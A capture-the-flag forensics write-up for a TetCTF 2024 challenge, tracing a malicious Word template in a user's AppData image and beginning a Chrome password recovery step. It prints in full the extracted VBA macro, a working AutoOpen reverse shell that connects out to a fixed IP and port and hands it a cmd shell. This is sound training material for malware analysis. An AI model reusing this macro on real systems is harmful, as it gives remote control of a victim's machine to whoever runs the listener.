We can quickly mount the .ad1 file using FTK Imager, and we are presented with the user's AppData folder.
Based on the description, we have two pieces of information:
User was in the process of registering for TETCTF (Reading the Rules)
Malicious code was downloaded onto the computer somehow
So we can start by looking for anything related to TETCTF first, as that was how the malicious code got onto the computer.
Opening the Office Folder in Roaming, we see a suspicious .lnk file with the name TetCTF2024-Rules.LNK, suggesting that a docx was opened.
Looking at the Templates directory, we receive a Windows Defender error upon clicking on one of the .dotm files, indicating a possible malware dropper.
Using olevba to extract the macros, we get the C2's IP and port as well as the first flag. In the NewMacros.bas module below, the Const ip and Const port lines at the top give the C2 address, the AutoOpen sub shows the macro runs as soon as the document is opened, and the base64-looking string in the trailing comment is where the flag is hidden.
โโโ(kaliใฟkali)-[~/Desktop/Random_Shit/TETCTF-2024-20240126-203010]โโ$olevbaNormal.dotm--decodeXLMMacroDeobfuscator:pywin32isnotinstalled (only isrequiredifyouwanttouseMSExcel)olevba0.60.1onPython3.11.6-http://decalage.info/python/oletools===============================================================================FILE:Normal.dotmType:OpenXMLWARNINGFornow,VBAstompingcannotbedetectedforfilesinmemory-------------------------------------------------------------------------------VBAMACROThisDocument.clsin file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'---------------------------------------(emptymacro)-------------------------------------------------------------------------------VBAMACRONewMacros.basin file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'---------------------------------------'CoppyConst ip = "172.20.25.15"Const port = "4444"Const INVALID_SOCKET = -1Const WSADESCRIPTION_LEN = 256Const SOCKET_ERROR = -1Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As LongEnd TypePrivate Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As LongPtr ai_addr As LongPtr ai_next As LongPtrEnd TypePrivate Type STARTUPINFOA cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As String hStdInput As LongPtr hStdOutput As LongPtr hStdError As LongPtrEnd TypePrivate Type PROCESS_INFORMATION hProcess As LongPtr hThread As LongPtr dwProcessId As Long dwThreadId As LongEnd TypeEnum af AF_UNSPEC = 0 AF_INET = 2 AF_IPX = 6 AF_APPLETALK = 16 AF_NETBIOS = 17 AF_INET6 = 23 AF_IRDA = 26 AF_BTH = 32End EnumEnum sock_type 
SOCK_STREAM = 1 SOCK_DGRAM = 2 SOCK_RAW = 3 SOCK_RDM = 4 SOCK_SEQPACKET = 5End EnumPrivate Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Private Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongPtr, ByVal SOCKADDR As LongPtr, ByVal namelen As Long) As Long
Private Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongPtr, lpResult As LongPtr) As Long
Private Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As LongPtr) As LongPrivate Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As LongPrivate Declare PtrSafe Function CreateProc Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFOA, lpProcessInformation As PROCESS_INFORMATION) As LongPtr
Private Declare PtrSafe Sub ZeroMemory Lib "kernel32" Alias "RtlZeroMemory" (Destination As STARTUPINFOA, ByVal Length As Long)
Private Declare PtrSafe Function WSASocketA Lib "ws2_32.dll" (ByVal af As Long, ByVal t As Long, ByVal protocol As Long, lpProtocolInfo As Any, ByVal g As Long, ByVal dwFlags As Long) As Long
Function revShell() Dim m_wsaData As WSADATA Dim m_RetVal As Integer Dim m_Hints As ADDRINFO Dim m_ConnSocket As LongPtr: m_ConnSocket = INVALID_SOCKET Dim pAddrInfo As LongPtr Dim RetVal As Long Dim lastError As Long Dim iRC As Long Dim MAX_BUF_SIZE As Integer: MAX_BUF_SIZE = 512 RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData) If (RetVal <> 0) Then MsgBox "WSAStartup failed with error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_family = af.AF_UNSPEC m_Hints.ai_socktype = sock_type.SOCK_STREAM RetVal = GetAddrInfo(ip, port, VarPtr(m_Hints), pAddrInfo) If (RetVal <> 0) Then MsgBox "Cannot resolve address " & ip & " and port " & port & ", error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_next = pAddrInfo Dim connected As Boolean: connected = False Do While m_Hints.ai_next > 0 CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints) m_ConnSocket = WSASocketA(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol, ByVal 0&, 0, 0) If (m_ConnSocket = INVALID_SOCKET) Then revShell = False Else Dim connectionResult As Long connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen) If connectionResult <> SOCKET_ERROR Then connected = True Exit Do End If closesocket (m_ConnSocket) revShell = False End If Loop If Not connected Then revShell = False RetVal = closesocket(m_ConnSocket) Call WSACleanup Exit Function End If Dim si As STARTUPINFOA ZeroMemory si, Len(si) si.cb = Len(si) si.dwFlags = &H100 si.hStdInput = m_ConnSocket si.hStdOutput = m_ConnSocket si.hStdError = m_ConnSocket Dim pi As PROCESS_INFORMATION Dim worked As LongPtr Dim test As Long worked = CreateProc(vbNullString, "cmd", ByVal 0&, ByVal 0&, True, &H8000000, 0, vbNullString, si, pi) revShell = workedEnd FunctionPublic Function MAKEWORD(Lo As Byte, Hi As Byte) As Integer MAKEWORD = Lo + Hi * 256& Or 32768 * (Hi > 127)End FunctionSub AutoOpen() Dim success As Boolean success = revShell()End 
Sub'Vmxjd2VFNUhSa2RqUkZwVFZrWndTMVZ0ZUhkU1JsWlhWRmhvVldGNlZrbFdSM2hQVkd4R1ZVMUVhejA9
For the second part of the flag, there are two ways to go about it.
Using Strings (Cheesing)
Simply running strings on the raw file and searching for the pattern Flag 2: gives us the flag.
Getting the chrome password and decrypting it (Intended)
The user states that he no longer remembers anything about his account, suggesting we have to do some sort of password recovery from a browser.
Looking at the .ad1 file, we can easily spot Google Chrome and its User Data directory, which we can use to extract Chrome's encryption key.